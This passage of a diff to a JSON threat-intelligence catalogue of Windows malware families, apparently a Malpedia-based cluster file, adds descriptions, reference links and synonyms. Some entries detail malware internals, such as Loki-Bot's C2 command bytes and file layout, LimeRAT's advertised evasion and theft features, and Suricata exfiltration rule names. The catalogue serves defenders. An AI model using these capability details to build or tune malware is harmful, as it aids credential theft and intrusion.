file, decoded and executed in a hidden window. The encoded and decoded payloads are written to files named igfxHK[%rand%].dat and igfxHK[%rand%].exe respectively, where [%rand%] is a 4-byte hexadecimal number based on the current timestamp. It persists by copying itself to the current user\u2019s Startup folder.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ironhalo", + "https://www.symantec.com/security-center/writeup/2015-122210-5128-99", + "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html", + "https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "44599616-3849-4960-9379-05307287ff80", + "value": "IRONHALO" + }, { "description": "2006 Gozi v1.0, Gozi CRM, CRM, Papras\r\n2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n\r\nIn September 2010, the source code of a particular Gozi CRM dll version was leaked. This led to two main branches: one became known as Gozi Prinimalka, which was merge with Pony and became Vawtrak/Neverquest.\r\n\r\nThe other branch became known as Gozi ISFB, or ISFB in short. Webinject functionality was added to this version.\r\n\r\nThere is one panel which often was used in combination with ISFB: IAP. The panel's login page comes with the title 'Login - IAP'. The body contains 'AUTHORIZATION', 'Name:', 'Password:' and a single button 'Sign in' in a minimal design. Often, the panel is directly accessible by entering the C2 IP address in a browser. But there are ISFB versions which are not directly using IAP. The bot accesses a gate, which is called the 'Dreambot' gate. See win.dreambot for further information.\r\n\r\nISFB often was protected by Rovnix. This led to a further complication in the naming scheme - many companies started to call ISFB Rovnix. Because the signatures started to look for Rovnix, other trojans protected by Rovnix (in particular ReactorBot and Rerdom) sometimes got wrongly labelled.\r\n\r\nIn April 2016 a combination of Gozi ISFB and Nymaim was detected. This breed became known as GozNym. The merge uses a shellcode-like version of Gozi ISFB, that needs Nymaim to run. The C2 communication is performed by Nymaim.\r\n\r\nSee win.gozi for additional historical information.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.isfb", - "https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html", - "https://arielkoren.com/blog/2016/11/01/ursnif-malware-deep-technical-dive/", - "https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb", - "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", + "https://blog.talosintelligence.com/2019/01/amp-tracks-ursnif.html", + "https://blog.minerva-labs.com/attackers-insert-themselves-into-the-email-conversation-to-spread-malware", "https://lokalhost.pl/gozi_tree.txt", - "https://www.youtube.com/watch?v=jlc7Ahp8Iqg", "https://isc.sans.edu/forums/diary/Reviewing+the+spam+filters+Malspam+pushing+GoziISFB/23245", - "https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/", "http://blog.talosintelligence.com/2018/03/gozi-isfb-remains-active-in-2018.html", "https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/", - "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/15", + "https://www.cylance.com/en_us/blog/threat-spotlight-ursnif-infostealer-malware.html", + "https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html", + "https://www.youtube.com/watch?v=KvOpNznu_3w", "https://www.rsa.com/de-de/resources/pandemiya-emerges-new-malware-alternative-zeus-based", - "https://www.cylance.com/en_us/blog/threat-spotlight-ursnif-infostealer-malware.html" + "https://www.youtube.com/watch?v=jlc7Ahp8Iqg", + "http://benkow.cc/DreambotSAS19.pdf", + "https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/", + "https://www.cyberbit.com/blog/endpoint-security/new-ursnif-malware-variant/", + "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/15", + "https://0ffset.net/reverse-engineering/analyzing-com-mechanisms-in-malware/", + "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html", + "https://0ffset.net/reverse-engineering/malware-analysis/analysing-isfb-loader/", + "https://arielkoren.com/blog/2016/11/01/ursnif-malware-deep-technical-dive/", + "https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb", + "https://blog.yoroi.company/research/ursnif-the-latest-evolution-of-the-most-popular-banking-malware/", + "https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features" ], "synonyms": [ "Gozi ISFB", @@ -8417,7 +9859,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismagent", - "http://www.clearskysec.com/ismagent/" + "http://www.clearskysec.com/ismagent/", + "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/" ], "synonyms": [], "type": [] @@ -8452,6 +9895,19 @@ "uuid": "8c95cb51-1044-4dcd-9cac-ad9f2e3b9070", "value": "iSpy Keylogger" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.israbye", + "https://twitter.com/malwrhunterteam/status/1085162243795369984" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c5cec575-325c-44b8-af24-4feb330eec8a", + "value": "IsraBye" + }, { "description": "ISR Stealer is a modified version of the Hackhound Stealer. It is written in VB and often comes in a .NET-wrapper.\r\nISR Stealer makes use of two Nirsoft tools: Mail PassView and WebBrowserPassView.\r\n\r\nIncredibly, it uses an hard-coded user agent string: HardCore Software For : Public", "meta": { @@ -8524,9 +9980,12 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaku", "https://www.forcepoint.com/sites/default/files/resources/files/report_jaku_analysis_of_botnet_campaign_en_0.pdf", + "https://securelist.com/whos-really-spreading-through-the-bright-star/68978/", "https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146" ], "synonyms": [ + "C3PRO-RACOON", + "KCNA Infostealer", "Reconcyc" ], "type": [] @@ -8547,6 +10006,20 @@ "uuid": "af6e89ec-0adb-4ce6-b4e6-610827e722ea", "value": "Jasus" }, + { + "description": "Ransomware written in Go.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jcry", + "https://twitter.com/IdoNaor1/status/1101936940297924608", + "https://twitter.com/0xffff0800/status/1102078898320302080" + ], + "synonyms": [], + "type": [] + }, + "uuid": "fea703ec-9b24-4119-96b3-7ae6bec3b203", + "value": "JCry" + }, { "description": "", "meta": { @@ -8693,6 +10166,19 @@ "uuid": "8a01c3be-17b7-4e5a-b0b2-6c1f5ccb82cf", "value": "Karius" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.karkoff", + "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a45c16d9-6945-428c-af46-0436903f9329", + "value": "Karkoff" + }, { "description": "", "meta": { @@ -8748,6 +10234,41 @@ "uuid": "7d69892e-d582-4545-8798-4a9a84a821ea", "value": "Kelihos" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kerrdown", + "https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/", + "https://blog.cystack.net/word-based-malware-attack/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "bd9e21d1-7da3-4699-816f-0e368a63bc18", + "value": "KerrDown" + }, + { + "description": "KeyBase is a .NET credential stealer and keylogger that first emerged in February 2015. It often incorporates Nirsoft tools such as MailPassView and WebBrowserPassView for additional credential grabbing.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.keybase", + "https://unit42.paloaltonetworks.com/keybase-keylogger-malware-family-exposed/", + "https://th3l4b.blogspot.com/2015/10/keybase-loggerclipboardcredsstealer.html", + "https://unit42.paloaltonetworks.com/keybase-threat-grows-despite-public-takedown-a-picture-is-worth-a-thousand-words/", + "https://community.rsa.com/community/products/netwitness/blog/2018/02/15/malspam-delivers-keybase-keylogger-2-11-2017", + "https://voidsec.com/keybase-en/", + "https://www.virusbulletin.com/virusbulletin/2016/07/new-keylogger-block/", + "https://isc.sans.edu/forums/diary/Malicious+Office+files+using+fileless+UAC+bypass+to+drop+KEYBASE+malware/22011/" + ], + "synonyms": [ + "Kibex" + ], + "type": [] + }, + "uuid": "8a7bb20e-7e90-4330-8f53-744bd5519f6f", + "value": "KeyBase" + }, { "description": "", "meta": { @@ -8786,7 +10307,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.keymarble", - "https://www.us-cert.gov/ncas/analysis-reports/AR18-221A" + "https://www.us-cert.gov/ncas/analysis-reports/AR18-221A", + "https://research.checkpoint.com/north-korea-turns-against-russian-targets/" ], "synonyms": [], "type": [] @@ -8794,19 +10316,6 @@ "uuid": "0c213d7f-8c71-4341-aeb0-13be71fbf4e5", "value": "KEYMARBLE" }, - { - "description": "", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.keypass", - "https://securelist.com/keypass-ransomware/87412/" - ], - "synonyms": [], - "type": [] - }, - "uuid": "447e5d7d-dd23-43b3-8cbc-b835498a49dd", - "value": "KeyPass" - }, { "description": "", "meta": { @@ -8872,6 +10381,7 @@ "description": "KleptoParasite Stealer is advertised on Hackforums as a noob-friendly stealer. It is modular and comes with a IP retriever module, a Outlook stealer (32bit/64bit) and a Chrome/Firefox stealer (32bit/64bit). Earlier versions come bundled (loader plus modules), newer versions come with a loader (167k) that grabs the modules.\r\n\r\nPDB-strings suggest a relationship to JogLog v6 and v7.", "meta": { "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer", "https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer" ], "synonyms": [ @@ -8888,7 +10398,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.klrd", "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", - "https://www.morphick.com/resources/news/klrd-keylogger" + "https://securitykitten.github.io/2016/11/28/the-klrd-keylogger.html" ], "synonyms": [], "type": [] @@ -8923,6 +10433,22 @@ "uuid": "f7674d06-450a-4150-9180-afef94cce53c", "value": "KokoKrypt" }, + { + "description": "KOMPROGO is a signature backdoor used by APT32 that is capable of process, file, and registry management, Creating a reverse shell, running WMI queries, retrieving information about the infected system.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.komprogo", + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", + "https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/SpyRATsofOceanLotusMalwareWhitePaper.pdf", + "https://www.symantec.com/security_response/earthlink_writeup.jsp?docid=2015-120808-5327-99", + "https://ruxcon.org.au/assets/2017/slides/bart-RuxCon-Presentation.pptx" + ], + "synonyms": [], + "type": [] + }, + "uuid": "116f4c5f-fd51-4e90-995b-f16c46523c06", + "value": "KOMPROGO" + }, { "description": "", "meta": { @@ -9019,10 +10545,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.krbanker", + "https://www.peppermalware.com/2019/03/analysis-of-blackmoon-banking-trojans.html", "http://researchcenter.paloaltonetworks.com/2016/05/unit42-krbanker-targets-south-korea-through-adware-and-exploit-kits-2/", "https://www.proofpoint.com/us/threat-insight/post/Updated-Blackmoon-Banking-Trojan", - "https://zairon.wordpress.com/2014/04/15/trojan-banking-47d18761d46d8e7c4ad49cc575b0acc2bb3f49bb56a3d29fb1ec600447cb89a4/", - "http://training.nshc.net/ENG/Document/virus/20140305_Internet_Bank_Pharming_-_BlackMoon_Ver_1.0_External_ENG.pdf" + "http://training.nshc.net/ENG/Document/virus/20140305_Internet_Bank_Pharming_-_BlackMoon_Ver_1.0_External_ENG.pdf", + "https://zairon.wordpress.com/2014/04/15/trojan-banking-47d18761d46d8e7c4ad49cc575b0acc2bb3f49bb56a3d29fb1ec600447cb89a4/" ], "synonyms": [ "BlackMoon" @@ -9050,13 +10577,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kronos", - "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/", + "https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack", "https://www.proofpoint.com/us/threat-insight/post/kronos-reborn", + "https://www.zdnet.com/article/security-researcher-malwaretech-pleads-guilty/", "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/", "https://www.lexsi.com/securityhub/overview-kronos-banking-malware-rootkit/?lang=en", "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/", "https://www.lexsi.com/securityhub/kronos-decrypting-the-configuration-file-and-injects/?lang=en", - "https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack", + "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/", "https://www.morphick.com/resources/news/scanpos-new-pos-malware-being-distributed-kronos", "https://securityintelligence.com/the-father-of-zeus-kronos-malware-discovered/", "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware", @@ -9124,12 +10652,26 @@ "uuid": "1fc49b8c-647a-4484-a2f6-e6f2311f8b58", "value": "Kurton" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kutaki", + "https://cofense.com/kutaki-malware-bypasses-gateways-steal-users-credentials/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ff40299b-dc45-4a1c-bfe2-3864682b8fea", + "value": "Kutaki" + }, { "description": "Kwampirs is a family of malware which uses SMB to spread. It typically will not execute or deploy in environments in which there is no publicly available admin$ share. It is a fully featured backdoor which can download additional modules. Typical C2 traffic is over HTTP and includes \"q=[ENCRYPTED DATA]\" in the URI.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kwampirs", - "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia" + "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia", + "https://www.securityartwork.es/2019/03/13/orangeworm-group-kwampirs-analysis-update/" ], "synonyms": [], "type": [] @@ -9213,6 +10755,19 @@ "uuid": "686a9217-3978-47c0-9989-dd2a3438ba72", "value": "Laziok" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazycat", + "https://blog.yoroi.company/research/the-arsenal-behind-the-australian-parliament-hack/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "454db469-724a-4084-873c-906abf91d0d5", + "value": "LazyCat" + }, { "description": "", "meta": { @@ -9259,6 +10814,21 @@ "uuid": "342f5c56-861c-4a06-b5db-85c3c424f51f", "value": "Lethic" }, + { + "description": " ## Description\r\n Simple yet powerful RAT for Windows machines. This project is simple and easy to understand, It should give you a general knowledge about dotNET malwares and how it behaves. \r\n \r\n ---\r\n\r\n## Main Features\r\n\r\n- **.NET**\r\n - Coded in Visual Basic .NET, Client required framework 2.0 or 4.0 dependency, And server is 4.0\r\n- **Connection**\r\n - Using pastebin.com as ip:port , Instead of noip.com DNS. And Also using multi-ports\r\n- **Plugin**\r\n - Using plugin system to decrease stub's size and lower the AV detection\r\n- **Encryption**\r\n - The communication between server & client is encrypted with AES\r\n- **Spreading**\r\n - Infecting all files and folders on USB drivers\r\n- **Bypass**\r\n - Low AV detection and undetected startup method\r\n- **Lightweight**\r\n - Payload size is about 25 KB\r\n- **Anti Virtual Machines**\r\n - Uninstall itself if the machine is virtual to avoid scanning or analyzing \r\n- **Ransomware**\r\n - Encrypting files on all HHD and USB with .Lime extension\r\n- **XMR Miner**\r\n - High performance Monero CPU miner with user idle\\active optimizations\r\n- **DDoS**\r\n - Creating a powerful DDOS attack to make an online service unavailable\r\n- **Crypto Stealer**\r\n - Stealing Cryptocurrency sensitive data\r\n- **Screen-Locker**\r\n - Prevents user from accessing their Windows GUI \r\n - **And more**\r\n - On Connect Auto Task\r\n\t- Force enable Windows RDP\r\n\t- Persistence\r\n - File manager\r\n - Passowrds stealer\r\n - Remote desktop\r\n - Bitcoin grabber\r\n - Downloader\r\n - Keylogger", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.limerat", + "https://www.youtube.com/watch?v=x-g-ZLeX8GM", + "https://blog.yoroi.company/research/limerat-spreads-in-the-wild/", + "https://github.com/NYAN-x-CAT/Lime-RAT/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "771dbe6a-3f01-4bd4-8edd-070b2eb9df66", + "value": "LimeRAT" + }, { "description": "", "meta": { @@ -9298,6 +10868,25 @@ "uuid": "2f9e1221-0a59-447b-a9e8-bedb010cd3d8", "value": "LiteHTTP" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockergoga", + "https://www.nrk.no/norge/skreddersydd-dobbeltangrep-mot-hydro-1.14480202", + "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "https://www.abuse.io/lockergoga.txt", + "https://doublepulsar.com/how-lockergoga-took-down-hydro-ransomware-used-in-targeted-attacks-aimed-at-big-business-c666551f5880", + "https://www.youtube.com/watch?v=o6eEN0mUakM", + "https://www.helpnetsecurity.com/2019/04/02/aurora-decrypter-mira-decrypter/", + "https://www.bleepingcomputer.com/news/security/new-lockergoga-ransomware-allegedly-used-in-altran-attack/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a4a6469d-6753-4195-9635-f11d458525f9", + "value": "LockerGoga" + }, { "description": "", "meta": { @@ -9358,7 +10947,7 @@ "value": "LockPOS" }, { - "description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as “Trojan.Nymeria”, although the connection is not well-documented.", + "description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as \u201cTrojan.Nymeria\u201d, although the connection is not well-documented.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.loda", @@ -9400,22 +10989,36 @@ "value": "LogPOS" }, { - "description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of ‘-u’ that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: “B7E1C2CC98066B250DDB2123“.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: “%APPDATA%\\ C98066\\”.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: “.exe,” “.lck,” “.hdb” and “.kdb.” They will be named after characters 13 thru 18 of the Mutex. For example: “6B250D.” Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically “ckav.ru”. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot’s C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2", + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lojax", + "https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "15228ae0-26f9-44d8-8d6e-87b0bd2d2aba", + "value": "LoJax" + }, + { + "description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of \u2018-u\u2019 that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: \u201cB7E1C2CC98066B250DDB2123\u201c.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: \u201c%APPDATA%\\ C98066\\\u201d.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: \u201c.exe,\u201d \u201c.lck,\u201d \u201c.hdb\u201d and \u201c.kdb.\u201d They will be named after characters 13 thru 18 of the Mutex. For example: \u201c6B250D.\u201d Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically \u201cckav.ru\u201d. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot\u2019s C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws", + "https://isc.sans.edu/diary/24372", "https://github.com/R3MRUM/loki-parse", "http://www.malware-traffic-analysis.net/2017/06/12/index.html", "https://www.lastline.com/blog/password-stealing-malware-loki-bot/", - "https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850", "https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file", "http://blog.fernandodominguez.me/lokis-antis-analysis/", "https://phishme.com/loki-bot-malware/", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://r3mrum.wordpress.com/2017/05/07/loki-bot-atrifacts/", + "https://securelist.com/loki-bot-stealing-corporate-passwords/87595/", "https://cysinfo.com/nefarious-macro-malware-drops-loki-bot-across-gcc-countries/", "https://github.com/d00rt/hijacked_lokibot_version/blob/master/doc/LokiBot_hijacked_2018.pdf", - "https://securelist.com/loki-bot-stealing-corporate-passwords/87595/" + "https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850" ], "synonyms": [ "Loki", @@ -9440,17 +11043,31 @@ "uuid": "fa61a690-fd9c-4036-97fb-bf3674aa60b2", "value": "Lordix" }, + { + "description": "LOWBALL, uses the legitimate Dropbox cloud-storage\r\nservice to act as the CnC server. It uses the Dropbox API with a hardcoded bearer access token and has the ability to download, upload, and execute files. The communication occurs via HTTPS over port 443.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lowball", + "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "484b9fd9-76c6-41af-a85b-189b0fc94909", + "value": "LOWBALL" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.luminosity_rat", - "https://krebsonsecurity.com/2018/07/luminositylink-rat-author-pleads-guilty/", + "http://malwarenailed.blogspot.com/2016/07/luminosity-rat-re-purposed.html", "https://researchcenter.paloaltonetworks.com/2018/02/unit42-rat-trapped-luminositylink-falls-foul-vermin-eradication-efforts/", "https://researchcenter.paloaltonetworks.com/2016/07/unit42-investigating-the-luminositylink-remote-access-trojan-configuration/", - "http://malwarenailed.blogspot.com/2016/07/luminosity-rat-re-purposed.html", + "https://krebsonsecurity.com/2018/07/luminositylink-rat-author-pleads-guilty/", "https://umbrella.cisco.com/blog/2017/01/18/finding-the-rats-nest/", - "https://www.proofpoint.com/us/threat-insight/post/Light-After-Dark" + "https://www.proofpoint.com/us/threat-insight/post/Light-After-Dark", + "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf" ], "synonyms": [], "type": 